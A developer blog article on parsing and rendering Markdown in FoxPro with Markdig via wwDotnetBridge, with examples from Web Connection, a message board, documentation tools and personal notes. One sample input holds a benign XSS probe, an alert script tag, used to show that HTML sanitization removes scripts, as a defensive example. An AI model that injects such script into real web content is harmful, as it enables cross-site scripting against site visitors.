The best option for Markdown parsing in FoxPro is to use one of the many .NET based Markdown parsers that are available. I'm a big fan of the MarkDig Markdown parser because it includes a ton of support features out of the box: the commonly used GitHub flavored Markdown, various table formats, link expansion, auto-id generation and fenced code blocks. Markdig is also extensible, so it's possible to create custom extensions that plug into Markdig's Markdown processing pipeline.

To access this .NET component from FoxPro I'm going to use wwDotnetBridge. There are a couple of different ways to deal with Markdown parsing, but let's start with the simplest, which is just to use the built-in 'just do it' function that Markdig itself provides:

do wwDotNetBridge
LOCAL loBridge as wwDotNetBridge
loBridge = GetwwDotnetBridge()
loBridge.LoadAssembly("Markdig.dll")

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ### Examples are great
> This is a block quote with a header

Here's a quick code block

```foxpro
lnCount = 10
FOR lnX = 1 TO lnCount
   ? "Item " + TRANSFORM(lnX)
ENDFOR
```
ENDTEXT

lcHtml = loBridge.InvokeStaticMethod("Markdig.Markdown","ToHtml",lcMarkdown,null)
? lcHtml
RETURN

Markdown Output

This is the raw code to load the Markdig DLL and then call the static MarkDig.Markdown.ToHtml() function to convert the Markdown into HTML. It works and produces the following HTML output:

<h1>Markdown Sample 2</h1>
<p>This is some sample Markdown text. This text is <strong>bold</strong> and <em>italic</em>.</p>
<ul>
<li>List Item 1</li>
<li>List Item 2</li>
<li>List Item 3</li>
</ul>
<p>Great it works!</p>
<blockquote>
<h3>Examples are great</h3>
<p>This is a block quote with a header</p>
</blockquote>

which looks like this:

Keep in mind that Markdown rendering produces an HTML fragment, which doesn't look very nice because it's just HTML without any formatting applied. There's no styling for the base HTML, and the code snippet is just raw text. To make this look a bit nicer we need to apply some formatting.

Here's that same HTML fragment rendered into a full HTML page with Bootstrap, highlightJs and a little bit of custom formatting applied:

This looks a lot nicer. The idea is to use a small template and merge the rendered HTML into it. Here's some code that uses a code based template (although I would probably store the template as a file and load it for easier customization):

Here's the template:

<!DOCTYPE html>
<html>
<head>
    <title>String To Code Converter</title>
    <link href="https://unpkg.com/bootstrap@4.1.3/dist/css/bootstrap.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css">
    <style>
        body, html {
            font-size: 16px;
        }
        body {
            margin: 10px 40px;
        }
        blockquote {
		    background: #f2f7fb;
		    font-size: 1.02em;
		    padding: 10px 20px;
		    margin: 1.2em;
		    border-left: 9px #569ad4 solid;
		    border-radius: 4px 0 0 4px;
		}
        @media(max-width: 600px) 
        {
            body, html {
                font-size: 15px !important;
            }
            body {
                margin: 10px 10px !important;                
            }
        }
    </style>
</head>
<body>
    <div style="margin: 20px 5%">
        <%= lcParsedHtml %>
    </div>
    <script src="https://weblog.west-wind.com/scripts/highlightjs/highlight.pack.js" type="text/javascript"></script>
    <link href="https://weblog.west-wind.com/scripts/highlightjs/styles/vs2015.css" rel="stylesheet" type="text/css" />
    <script>
		function highlightCode() {
		    var pres = document.querySelectorAll("pre>code");
		    for (var i = 0; i < pres.length; i++) {
    		    hljs.highlightBlock(pres[i]);
	    	}
		}
		highlightCode();
    </script>
</body>
</html>

And here is the code that parses the Markdown and merges it into the template. Notice the <%= lcParsedHtml %> tag, which is responsible for merging the parsed HTML into the template:

DO MarkdownParser

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ### Examples are great
> This is a block quote with a header

ENDTEXT

lcParsedHtml = Markdown(lcMarkdown,2)
? lcParsedHtml

lcTemplate = FILETOSTR("markdownpagetemplate.html")

*** Ugh: TEXTMERGE mangles the line breaks for the code snippet so manually merge
lchtml = STRTRAN(lcTemplate,"<%= lcParsedHtml %>",lcParsedHtml)
ShowHtml(lcHtml)

Beware of TEXTMERGE

FoxPro's TEXTMERGE command can have some odd side effects - when using << lcParsedHtml >> in the example above, TEXTMERGE mangled the line breaks, running text together instead of properly breaking lines based on the Markdown parser's \n linefeed-only output. When merging output from a Markdown parser into an HTML document, explicitly replace the content rather than relying on TEXTMERGE.

Using the underlying Parser

The Markdown() function is very easy to use, and it relies on a cached instance of the parser so the Markdown object doesn't have to be configured for each use. If you want a little more control, you can use the underlying MarkdownParser class directly. This is a little more verbose but gives you more control.

TEXT TO lcMarkdown NOSHOW
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3


<script>alert('Gotcha!')</script>
Great it works!

> #### Examples are great
> This is a block quote with a header
ENDTEXT

loParser = CREATEOBJECT("MarkdownParser")
loParser.lSanitizeHtml = .T.
lcParsedHtml = loParser.Parse(lcMarkdown)

? lcParsedHtml
ShowHtml(lcParsedHtml)

There's also a MarkdownParserExtended class that adds a few additional features, including support for FontAwesome icons via a special syntax and special escaping of <%= %> expressions, which are removed from the document before the Markdown parser runs so they don't interfere with the parser.

Sanitizing HTML

Because Markdown is a superset of HTML, you should treat all Markdown captured from users as dangerous.

Let me repeat that:

User Captured Markdown has to be Sanitized

Any Markdown input you capture from users that will be displayed on a Web site later should be treated just like raw HTML input - it should be considered dangerous and susceptible to Cross Site Scripting (XSS) attacks.

You might have noticed the code above that does:

loParser.lSanitizeHtml = .T.

which enables HTML sanitation of the Markdown before it is returned. This flag forces <script> tags, javascript: directives and any onXXXX= event attributes to be removed from the output HTML. This is the default setting and it's always what's used when you call the Markdown() function.
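As a quick sanity check - a sketch using the same MarkdownParser class shown above - you can verify that script tags don't survive the parse:

DO MarkdownParser
loParser = CREATEOBJECT("MarkdownParser")
loParser.lSanitizeHtml = .T.
lcHtml = loParser.Parse("Hello <script>alert('Gotcha!')</script> **World**")
? "<script" $ LOWER(lcHtml)   && .F. - the script tag was stripped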

Sanitation should usually be on, which is why it's the default, but there are a few scenarios where it makes sense to turn this flag off. If you are in full control of the content you might have good reason to embed scripts. For example, I use Markdown for blog posts, and occasionally I link to my own code snippets on gist.github.com, which requires <script> tags to embed the scripts.

If the content you create is controlled, then this is not a problem - in that case I'm the only consumer. If you use Markdown for product descriptions in your product catalog, and the data is all internally created, then it's probably safe to allow scripts. But even so - if you don't need scripts, don't allow them. Better safe than sorry - always!

Static Markdown in Web Connection

In addition to the simple Markdown Parsing, if you're using Web Connection there are a couple of useful features built into the framework that let you work with Markdown content.

  • Static Markdown Islands in Scripts and Templates
  • Static Markdown Pages

If you're building Web sites you probably have a bit of static content. Even if your site is mostly dynamic, almost every site has a number of static pages or a bunch of content that is just text, like disclaimers or maybe some page level help content. Markdown is usually much easier to type than HTML markup for this kind of lengthy text.

Markdown Islands

Web Connection Scripts and Templates support a special <markdown> tag. Basically you can embed a small block of Markdown into the middle of a larger Script or Template:

<markdown>
    > ##### Please format your code
    > If your post contains any code snippets, you can use the `<\>` button
    > to select your code and apply a code language syntax. It makes it
    > **much easier** for everyone to read your code.
</markdown>

This can be useful if you have an extended block of text inside of a larger page. For example, you may have a download page that shows a rich HTML layout for download options, while the bottom half of the page has disclaimers, licensing and other content that's mostly just text (perhaps with a little HTML mixed in, which you can do inside of Markdown). Here's that example:

Static Markdown Pages

Sometimes you simply want to add a static page that is all or mostly text. Think about your About page, privacy policy, licensing pages etc. There are other more dynamic use cases as well. For example, you might want to create blog entries as Markdown Pages and simply store them on the server by dropping the page into a folder along with its related assets.

As of Web Connection 6.22 you can now drop a .md file into a folder and Web Connection will serve that file as an HTML document.

There's a new .md script map that Web Connection adds by default. For existing projects you can add the .md scriptmap to your existing scriptmaps for your site and then update the wwScripting class from your Web Connection installation.

There's also a new ~/Views/MarkdownTemplate.wcs, which is a script page into which the Markdown is rendered. Web Connection then generically maps any incoming .md extension files to this template and renders the Markdown into it.

The template can be extremely simple:

<%
    pcPageTitle = IIF(type("pcTitle") = "C", pcTitle, pcFilename)
%>
<% Layout="~/views/_layoutpage.wcs" %>
<div class="container">
    <%= pcMarkdown %>
</div>

This page simply references the master layout page and then creates a Bootstrap container into which the Markdown is rendered. There are two variables that are passed into the template: pcMarkdown and pcTitle. The title is extracted from the document, either by looking for a YAML title header:

---
title: Markdown in FoxPro
postId: 432
---
# Markdown in FoxPro
Markdown is... and blah blah blah 

or by looking for the first # header element towards the top of the document (the first 1500 characters).
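A naive FoxPro sketch of that fallback lookup - a hypothetical helper, not the actual Web Connection implementation - might look like this:

*** Hypothetical helper: find the first '# ' header in the first 1500 chars
FUNCTION GetMarkdownTitle(lcMarkdown)
LOCAL lcSearch, lnPos, lcLine, lnEnd
lcSearch = CHR(10) + LEFT(lcMarkdown, 1500)
lnPos = AT(CHR(10) + "# ", lcSearch)
IF lnPos < 1
   RETURN ""
ENDIF
lcLine = SUBSTR(lcSearch, lnPos + 3)   && text after the '# '
lnEnd = AT(CHR(10), lcLine)
IF lnEnd > 0
   lcLine = LEFT(lcLine, lnEnd - 1)    && cut at the end of the header line
ENDIF
RETURN ALLTRIM(CHRTRAN(lcLine, CHR(13), ""))
ENDFUNC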

Once the scriptmap and template are in place you can now simply place a .md document into the site's folder structure and it'll be served as HTML when referenced via the browser.

For the following example, I took an existing blog post I'd written in Markdown Monster as a Markdown file. I set up a folder structure for blog posts that encodes date parts in the path, and simply dropped the existing Markdown file and its associated images into that folder:

And voila - I can now access this file at the specified URL:

https://localhost/wconnect/Markdown/posts/2018/09/25/FixwwDotnetBridgeBlocking.md

The folder structure provides the URL sections that fix the post uniquely in time, which is common for blog posts. This is an easy way to add a blog to a Web site without much effort at all. Simply write Markdown as a file and copy it to the server. For bonus points, integrate this with Git to allow posts to be edited and published using Git.

Using Markdown in Applications

Let's look at a few examples of how I use Markdown in my own applications.

West Wind Support Message Board

In a Web Application it's easy to use Markdown and just take the output and stuff it into part of your rendered HTML page.

For example, on my message board I let users enter Markdown for messages that are then posted and displayed on the site:

The message board is available as a Web Connection sample site on GitHub:

The site displays each thread as a set of messages, with each message displaying its own individual Markdown content. This is a Web Connection application that uses templates.

The process class code just retrieves all the messages into a cursor from a business object and then uses a script page to render the output:

FUNCTION Thread(lcThreadId)
LOCAL loMsgBus

pcMsgId = Request.QueryString("msgId")

loMsgBus = CREATEOBJECT("wwt_Message")
lnResult = loMsgBus.GetThreadMessages(lcThreadId)

IF lnResult < 1
   Response.Redirect("~/threads.wwt")
   RETURN
ENDIF

PRIVATE poMarkdown
poMarkdown = THIS.GetMarkdownParser()

Response.GzipCompression = .T.

*** Don't auto-encode - we manually encode everything
*** so that emojii's and other extendeds work in the
*** markdown text
Response.Encoding = ""
Response.ContentType = "text/html; charset=utf-8"

Response.ExpandScript("~/thread.wwt")

This retrieves a list of messages that belong to the thread, and the template loops through them and displays the Markdown for each of the messages (simplified):

<%
    pcPageTitle = STRCONV(subject,9) + " - West Wind Message Board"
    pcThreadId = Threadid
%>
<% Layout="~/views/_layoutpage.wcs" %>

<div class="main-content">
    ... page header omitted

    <div class="thread-title page-header-text" style="margin-bottom: 0;">
        <%: TRIM(Subject) %>
    </div>

    <!-- Message Loop -->
    <%
        lnI = 0
        SCAN
           lnI = lnI + 1
    %>
    <div id="ThreadMessageList">
        <article class="message-list-item" data-id="<%= msgId %>" data-sort="<%= lnI %>">
            ... header omitted

            <!-- Render the Message Markdown here -->
            <div class="message-list-body">
                <%= poMarkdown.Parse(Message,.T.) %>
            </div>
        </article>
    </div>
    <% ENDSCAN %>
</div>

Note that I'm not using the Markdown() function directly, as I'm doing some custom setup, and I also want to explicitly force the output to UTF-8 as part of the parsing process (the .T. parameter). The reason I'm using a custom function is that I need to explicitly strip out <% %> scripts before rendering so that they don't get executed as part of user input. I also want all links to automatically open in a new window called wwt by having a target attribute added to each and every link tag.

In short, I need a customized parser, and the generic Markdown() function doesn't quite provide what I need, so I implement my own version that is customized to my needs.

PROTECTED FUNCTION GetMarkdownParser()
LOCAL loMarkdown

PUBLIC __wwThreadsMarkdownParser
IF VARTYPE(__wwThreadsMarkdownParser) = "O"
   loMarkdown = __wwThreadsMarkdownParser
ELSE
	loMarkdown =  CreateObject("MarkdownParserExtended")
	loMarkdown.lFixCodeBlocks = .T.
	loMarkdown.cLinkTarget = "wwt"
	__wwThreadsMarkdownParser = loMarkdown
ENDIF

RETURN loMarkdown
ENDFUNC

This is very similar to what Markdown() does internally, but customized to my own needs. It still caches the parser instance in a global variable so it doesn't have to be recreated for each and every serving which improves performance.

Entering Markdown

The message board also captures Markdown text when users write a new message:

The data entry here is a simple <textarea></textarea>. As mentioned Markdown is just text, so a <textarea> works just fine.

<textarea id="Message" name="Message"
        style="min-height: 350px;padding: 5px; 
        font-family: Consolas, Menlo, monospace; border: none;
        background: #333; width: 100% ; color: #fafafa"><%= Request.FormOrValue('Message',poMsg.Message) %></textarea>

I simply changed the color scheme to light text on a dark background just to make it more 'terminal like' (I happen to like dark themes, if you haven't noticed). There is also logic to insert special Markdown into the textbox via selections using JavaScript and key shortcuts, but that's just a bonus.

The text is previewed as you type on the client side using a JavaScript component (markedJs) that simply re-renders as the user types a message. Oddly enough, people still seem to screw up posting code constantly, even though the buttons are pretty prominent, as is the message below. Go figure.

Using Markdown for Inventory Item information

A common use case for Markdown is in desktop applications that need to handle rich text information. For example, in my Web Store I use Markdown for the item descriptions that are displayed in the store. I also have an offline application that I primarily use to manage my orders and inventory. The inventory form allows me to enter the item description as plain Markdown text, and a simple preview button lets me see the rendered content in the default browser.

If it's all good I can upload the item to my Web Server via a Web service and look at the item online where the Markdown is rendered using Markdig as shown before (but using .NET in this case).

The desktop application doesn't use Markdown in other places so here I just do the simplest thing possible in .NET code:

private void btnPreview_Click(object sender, EventArgs e)
{
    var builder = new MarkdownPipelineBuilder()
        .UseEmphasisExtras()
        .UsePipeTables()
        .UseGridTables()
        .UseAutoLinks() // URLs are parsed into anchors
        .UseAutoIdentifiers(AutoIdentifierOptions.GitHub) // Headers get id="name" 
        .UseAbbreviations()
        .UseYamlFrontMatter()
        .UseEmojiAndSmiley(true)
        .UseMediaLinks()
        .UseListExtras()
        .UseFigures()
        .UseCustomContainers()
        .UseGenericAttributes();

    var pipeline = builder.Build();
    
    var parsedHtml = Markdown.ToHtml(Item.Entity.Ldescript,pipeline);

    var html = PreviewTemplate.Replace("${ParsedHtml}", parsedHtml);
    ShellUtils.ShowHtml(html);
}

ShellUtils.ShowHtml(html); is part of Westwind.Utilities and simply takes an HTML fragment or a full HTML document, dumps it to a file, then shows that file in the default browser - which is the browser window shown in the previous figure.
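The ShowHtml() helper used in the earlier FoxPro samples works the same way. Here's a minimal sketch of what such a helper might look like (the ShellExecute declaration is the standard Windows API):

*** Minimal sketch of a ShowHtml() style helper
PROCEDURE ShowHtml(lcHtml)
LOCAL lcFile
lcFile = ADDBS(SYS(2023)) + "_preview.html"
STRTOFILE(lcHtml, lcFile)

*** Open the file in the default browser
DECLARE INTEGER ShellExecute IN shell32.dll ;
   INTEGER hWnd, STRING lpOperation, STRING lpFile, ;
   STRING lpParameters, STRING lpDirectory, INTEGER nShowCmd
ShellExecute(0, "open", lcFile, "", "", 1)
ENDPROC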

Using Markdown for Documentation

As mentioned, Markdown is great for text entry, and documentation creation is the ultimate writing exercise. There are a couple of approaches that can be taken with this. I work on two separate tools related to documentation:

  • West Wind Html Help Builder
    An older FoxPro application that stores documentation content in FoxPro tables. The application was updated a while back to use Markdown for all memo style text entry.

  • KavaDocs
    This is a newer tool still under development that uses Markdown files on disk with embedded meta data to hold documentation and related data. The system is based on Git to provide shared editing functionality and collaboration. There are also many integrations with other technologies.

Help Builder and Traditional Help Systems

Help Builder uses FoxPro tables and is a self-contained solution where everything lives in a single tool. Help Builder was originally designed for building CHM files for use with FoxPro and other tools, and the UI reflects that. In recent years however the focus has been on building Web based output along with a richer Web UI than was previously used.

Help Builder internally uses script templates to handle the layout for each topic type. The following is the main topic template into which the content of the oTopic object - with the properties that make up the help content - is rendered:

<% Layout="~/templates/_Layout.wcs" %><h1 class="content-title"><img src="bmp/<%= TRIM(LOWER(oHelp.oTopic.Type))%>.png"><%= iif(oHelp.oTopic.Static,[<img src="bmp/static.png" />],[]) %><%= EncodeHtml(TRIM(oHelp.oTopic.Topic)) %></h1><div class="content-body" id="body"><%= oHelp.FormatHTML(oHelp.oTopic.Body) %></div><% IF !EMPTY(oHelp.oTopic.Remarks) %><h3 class="outdent" id="remarks">Remarks</h3><blockquote>        <%= oHelp.FormatHTML(oHelp.oTopic.Remarks) %></blockquote><% ENDIF %>  <% IF !EMPTY(oHelp.oTopic.Example) %><h3 class="outdent" id="example">Example</h3><%= oHelp.FormatExample(oHelp.oTopic.Example)%><% ENDIF %>   <% if !EMPTY(oHelp.oTopic.SeeAlso) %><h3 class="outdent" id="seealso">See also</h3><%= lcSeeAlsoTopics %><%  endif %>

These templates are customizable by the user.

The key item to note here is the oHelp.FormatHTML() function, which is responsible for turning the content of a specific multi-line field into HTML. There are several supported formats, with Markdown being the newest addition.

***********************************************************************
* wwHelp :: FormatHtml
*********************************
LPARAMETER lcHTML, llUnformat, llDontParseTopicLinks, lnViewMode
LOCAL x, lnRawHTML, lcBlock, llRichEditor, lcText, lcLink

IF EMPTY(lnViewMode)
  IF VARTYPE(this.oTopic) == "O"
     lnViewMode = this.oTopic.ViewMode
  ELSE
     lnViewMode = 0
  ENDIF     
ENDIF

*** MarkDown Mode
IF lnViewMode = 2 
   IF TYPE("poMarkdownParser") # "O"
      poMarkdownParser = CREATEOBJECT("wwHelpMarkDownParser")
      poMarkdownParser.CreateParser(.t.,.t.)
   ENDIF
   RETURN poMarkdownParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF  

IF lnViewMode = 1
   RETURN lcHtml
ENDIF

IF lnViewMode = 0 OR lnViewMode = 1
	loParser = CREATEOBJECT("HelpBuilderBodyParser")	
	RETURN loParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF

RETURN "Invalid ViewMode"
* EOF wwHelp::FormatHtml

As I showed earlier in the Message Board sample, here again I use the Markdig parser, but in this case there's some additional logic built on top of the base Markdown parser that deals with Help Builder specific directives and formatting options. wwHelpMarkdownParser extends MarkdownParserExtended to do this.

As before, the parser is cached so that an existing instance doesn't have to be created again. Each topic can have up to 5 Markdown sections, so reuse is an important performance point. The template renders HTML output into a local file, which is then displayed in the preview on the left in a Web Browser control.

Output generation varies: when previewing, a local file is generated and displayed from disk. Online, there's a full HTML UI that surrounds each topic and provides topic navigation:

The online version is completely static, so the Markdown to HTML generation actually happens during build time of the project. Once generated you end up with a static HTML Web site that can just be uploaded to a Web server.

KavaDocs

KavaDocs is another documentation project I'm working on with Markus Egger. It also uses Markdown but the concept is very different and relies on Markdown files on disk and online in a Git repository. There are two components to this tool. One is a local Markdown Monster Addin that basically provides project features to tie together the Markdown files that otherwise just exist on disk. The KavaDocs Addin provides a table of contents and hierarchy and some base information about topics. Most of the topic related information is actually stored inside of the topic files as YAML data.

Files are stored and edited as plain Markdown files with topic content stored inside each of the topics. The Table of Contents contains the topics list to tie the individual topics together along with a few bits of other information like keywords, categories, related links and so on.

The other part of KavaDocs is an online application. It's a SaaS application that can serve this Markdown based documentation content dynamically via a generic Web service interface. You create a Web site like markdownmonster.kavadocs.com, which then serves the documentation directly from a GitHub repository using a number of nicely formatted and real-time switchable themes.

The concept here is very different in that the content is entirely managed on disk via plain Markdown files. The table of contents pulls the project information together, and Git serves as the distribution mechanism. The Web site provides the front end while Git provides the data store.

The big benefit of this solution is that it's easy to collaborate. Since all documentation is done as Markdown text it's easy to sync changes via Git, and any changes merged into the master branch are immediately visible. It's a really quick way to get documentation online.

White Papers and Articles like this one

These days I much prefer to write everything I can in Markdown. However, for articles in print or even some online magazines, the standard for documents continues to be Microsoft Word, mainly because the review process in Word is well defined.

However, I like to write my original document in Markdown because I simply have a more efficient workflow writing this way - with really easy ways to capture images and paste them into documents, for example. Markdown Monster's image pasting feature also copies files to disk and optimizes them, and it's just a huge time saver, as is the built-in image capture integration using either SnagIt or a built-in capture. Linking to Web content is much quicker with Markdown too, as is dealing with the frequently changing code snippets of technical articles. Believe me when I say that using Markdown can shave hours off document creation for me compared to using Word.

So for publications I often write in Markdown and then export the document to Word, either by rendering to HTML and importing the HTML, or by using PanDoc - the Swiss Army knife of document conversion - to convert my Markdown directly to Word or PDF. PDF conversions can be very good, as you can see in the Markdown Monster generated PDF output of the original document for this article here. Conversions to MS Word are usually good, but they do need adjustments for the often funky paragraph formatting required by publishers. Even with that step, writing in Markdown plus document fixing is usually easier than writing in Word.
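If you haven't used PanDoc before, the basic conversions are one-liners from the command line; PDF output additionally requires a LaTeX engine to be installed:

pandoc Article.md -o Article.docx
pandoc Article.md -o Article.pdf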

The other advantage of this approach is that once the document is in Markdown I can reuse the document much more easily. If you've ever written a Word document and then tried to publish that Word document on the Web, you know what a hot mess Microsoft Word HTML is. It works but the documents are huge and basically become uneditable as HTML.

With a document written in Markdown I can convert my doc to Word and do a quick edit/cleanup pass before pushing it to my publisher, but I can then turn around and use the same Markdown to publish it on my blog, submit the PDF to the conference, and also make it available on GitHub for editing. I can also use the page handler I described earlier to simply drop the Markdown file plus the images into a folder on my Web site.

IOW, Markdown makes it much easier to reuse the content you create because it is just text and inherently more portable.

Generic Markdown Usage

Once you get the Markdown bug you'll find a lot of places where you can use Markdown. I love using Markdown for notes, todo lists, keeping track of client info, call logs, quick time tracking and other stuff.

Here are a few examples.

Using Gists to publish Markdown Pages

GitHub has a related site that allows you to publish individual code snippets for sharing. GitHub Gist is basically a mini Git repository that holds one or more files that you can quickly post and share. It's great for sharing a code snippet on Twitter or another social network that you can then link to from a Tweet, for example.

Gists are typically named as files and the file extension determines what kind of syntax coloring is applied to the snippet or snippets. One of the supported formats is Markdown, which makes it possible to easily create a Gist and write and publish an entire article.

Gists are essentially mini documents that can be posted as code snippets on the Web. It's an easy way to share code snippets - or even to treat Gists like a simple micro blogging platform:

Gists can be shared via URL, and can also be retrieved via a simple REST API.

For example, Markdown Monster allows you to open a document from Gist using Open From Gist. You can edit the document in the local editor, then post it back to the Gist which effectively updates it. All this happens through two very simple JSON REST API calls.

One fly in the ointment with this approach is that images have to be linked as absolute Web URLs, because there's no facility to upload images as part of a Gist. You can upload images to a GitHub image repo, Azure Blob storage or some similar mechanism to give your images absolute URLs.

I love posting Gists for code samples. Although Gists support posting specific language files (like FoxPro or C# files), I'd much rather post a Markdown document that includes the code and then describes more info around the code snippet.

Markdown for Everything? No!

Ok, so I've been touting Markdown as pretty awesome, and I really think it addresses many of the issues I've had over the years with writing for publications, writing documentation or simply keeping track of things. Using Markdown has made me more productive for many text editing tasks.

But at the same time there are limits to what you can effectively do with Markdown, at least to date. For magazine articles I still tend to need Word. Although I usually write my articles using Markdown, I usually have to convert them to a Word document (which BTW is easy via HTML conversion, or by using a tool like PanDoc to convert Markdown to Word). The reason is that my editors work with Word, and when all is said and done Word's document review and comparison features are second to none. While you can certainly do change tracking and multi-user syncing by using Markdown with Git, it's not anywhere near as smooth as what's built into Word.

There are other things that Markdown is not good for. When talking about HTML, Markdown addresses bulk text editing needs nicely. If you're editing an About page, Privacy Policy, sales page etc., Markdown is much easier than HTML to get into the page. Even larger blocks of HTML text inside of larger HTML documents are a good fit for Markdown, using what I call Markdown Islands. But Markdown is not a replacement for full HTML layout. You're not going to replace entire Web sites using just Markdown - you still need raw HTML for layout and overall site behavior.

In short, make sure you understand what you're using Markdown for and whether that makes sense. I think it's fairly easy to spot the edges where Markdown usage is or isn't the best choice. If you're dealing with mostly text data, Markdown is probably a good fit. Know what works...

Markdown for Notes and Todo Lists

In addition to application related features, I've also found Markdown to be an excellent format for note taking and general writing. It's easy to create lists with Markdown text, so it's easy to open up a Markdown document and just fire away.

Here are some things I keep in Markdown:

General Notes

  • General Todo List
  • Phone Call Notes Document

Client Specific Notes

  • Client specific Notes
  • Client specific Work Item List
  • Client Logins/Account information (using MM Encrypted Files)

Shared Content - DropBox/OneDrive

  • Clipboard.md - machine sharable clipboard

Shared Access: DropBox or Git

First off, I store most of my notes and todo items in shared folders of some sort. My personal notes and todo lists are stored on DropBox in a custom Notes folder which has task specific sub-folders.

For customers I tend to store my public notes in Git repositories along with the source code (usually in a Documentation or Administration folder). Private notes I keep in my DropBox Notes folder.

Markdown Monster Favorites

Another super helpful feature in Markdown Monster that I use a lot is the Favorites feature. Favorites lets me pin individual Markdown documents - like my call log and todo list - or an entire folder on the searchable Favorites tab. This makes it very quick to find relevant content without keeping a ton of Markdown documents open all the time.

Summary

Markdown is simple tech which on the surface seems like a throwback to earlier days of technology. But - to me at least - the simpler technology actually means better productivity and much better control over the document format. The simplicity of text means I get a fast editor, easy content focused editing and, as an extra bonus as a developer, the opportunity to hack on Markdown with code. It's just text, so it's easy to handle custom syntax or otherwise manipulate the Markdown document.

In fact, I went overboard on this and created my own Markdown editor, because frankly the tooling that was out there for Windows really sucked. Markdown Monster is my vision of how I want a Markdown editor to work. I write a lot, and so a lot of first hand writing experience and convenience is baked into this editor and the Markdown processing that happens. If I was dealing with a proprietary format like Word, or even with just HTML, none of that would be possible. But because Markdown is just text there are lots of opportunities to manipulate both the Markdown itself - in terms of the (optional) UI editing experience - as well as the output generation. It's truly awesome what is possible.

this post was created and published with Markdown Monster

